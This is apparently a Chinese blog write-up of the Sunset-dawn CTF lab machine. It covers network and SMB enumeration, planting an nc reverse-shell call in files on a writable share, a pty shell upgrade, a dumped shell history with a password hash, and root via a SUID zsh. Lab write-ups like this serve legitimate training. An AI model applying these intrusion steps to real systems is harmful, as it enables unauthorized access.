侧边栏壁纸
博主头像

  • 累计撰写 12 篇文章
  • 累计创建 12 个标签
  • 累计收到 1 条评论

目 录CONTENT

文章目录

Sunset-dawn

⠀
2022-02-02 / 0 评论 / 0 点赞 / 216 阅读 / 2,166 字 / 正在检测是否收录...

信息收集

netdiscover 网络扫描工具

netdiscover -i eth0 -r 192.168.119.0/24

16435299006733619b3d9e0d645a2908bac93652e47c5.png
发现靶机IP 192.168.119.160

 nmap -A -p1-65535 192.168.119.160   

16435302385828147a27c05ae4a7d8c63395d8f18b623.png
托管Apache httpd服务的端口80,打开了端口139,445,3306
这告诉我们,NetBIOS 和 MySQL 服务分别在目标计算机上运行
开了80端口先看80
提示错误 网站正在建设中 。
3.png

dirb 目录扫描

4.png
发了一个logs目录
http://192.168.119.160/logs/
发现4个日志文件
5.png
其他三个提示错误
6.png
只有最后一个日志文件可以打开
7.png

enum4linux扫描

做所有简单枚举(-U -S -G -P -r -o -n -i)
enum4linux -a 192.168.119.160
找到 smb服务 有共享目录
在前面的扫描也发现了smb文件共享服务尝试连接一下
8.png

smbclient -L  //192.168.119.160 

9.png
连接一下ITDEPT 目录
发现两个文件 ,看看能不能尝试替换这两个文件进行shell
10.png
使用 echo 命令在这些文件中输入了 nc shell 调用脚本
也可以使用vim等进行编写
11.png
上传 成功
12.png

nc 连接shell

切换到bash 界面

python -c 'import pty;pty.spawn("/bin/bash")'

13.png
查看有用信息
sudo -l
root 可以执行的有一个mysql文件
14.png
history
有用的信息很多
看见了切换到一个root只有有一个zsh

history
    1  echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
    2  ls 
    3  ls -la 
    4  nano .bash_history 
    5  echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
    6  nano .bash_history 
    7  echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
    8  sudo -l 
    9  su 
   10  sudo -l 
   11  sudo mysql -u root -p 
   12  ls -la 
   13  nano .bash_history 
   14  exit 
   15  sudo -l 
   16  exit 
   17  ls
   18  ./view-product 
   19  ls -la 
   20  cd /dev/dawn/
   21  ls
   22  echo '#!/bin/bash' > specimen
   23  ls -la 
   24  echo '#!/bin/bash' > specimens
   25  exit
   26  id
   27  ls -la 
   28  exit
   29  cd /dev/
   30  ls
   31  cd dawn/
   32  ls
   33  ./specimen 
   34  exit
   35  su root 
   36  ls -la 
   37  ./view-product 
   38  exit
   39  id
   40  exit
   41  ls -la 
   42  ./view-product 
   43  exit
   44  ./view-product 
   45  exit
   46  ls -la 
   47  ./view-product 
   48  exit
   49  ./view-product 
   50  exit
   51  ls -la 
   52  ./view 
   53  ./view-product  
   54  ls -la 
   55  exit
   56  ./view-product 
   57  exit
   58  ls
   59  ./view-product 
   60  ls -la 
   61  id
   62  zsh
   63  ./view-product 
   64  exit
   65  ./view-product 
   66  ls -la 
   67  exit
   68  ls -la 
   69  exit
   70  ls -la    
   71  ./view-product
   72  ls -la 
   73  exit
   74  ./view-product
   75  chmod +x view-product
   76  exit
   77  ./view-product 
   78  su root
   79  su root 
   80  ./view-product 
   81  su - root
   82  cd
   83  su 
   84  cd /tmp
   85  ls
   86  ./view-product w
   87  rm view-product view-product.cpp 
   88  su root
   89  exit
   90  zsh 
   91  sudo -l 
   92  cat .bash_history 
   93  cd /tmp 
   94  ls -la 
   95  su 
   96  cd /dev/dawn/
   97  ls
   98  echo '#!/bin/bash' > specimen 
   99  echo '/bin/bash' >> specimen 
  100  chmod +x specimen 
  101  cd /tmp
  102  ls
  103  ./view-product 
  104  exit
  105  cd gaminedes
  106  cd ../gaminedes 
  107  cd ..
  108  ls 
  109  cd ganimedes/
  110  ls 
  111  ls -la 
  112  su gaminedes 
  113  su ganimedes 
  114  cat .bash_history  
  115  cd
  116  nano .bash_history 
  117  exit
  118  ls 
  119  cd ITDEPT/
  120  ls
  121  ls -la 
  122  exit
  123  cd /tmp 
  124  ls -la 
  125  ls
  126  cd
  127  ls
  128  sudo -l
  129  hisotry
  130  history

提权

find 查找 试一下
查找拥有suid权限的命令

find / -perm -40002>/dev/null

15.png
查找到zsh
16.png
mysql 没有密码进入不了
17.png
其他也全都要密码
进入cd /home/ganimedes
找到.bash_history 文件可以找到root 密码18.png
19.png

0

评论区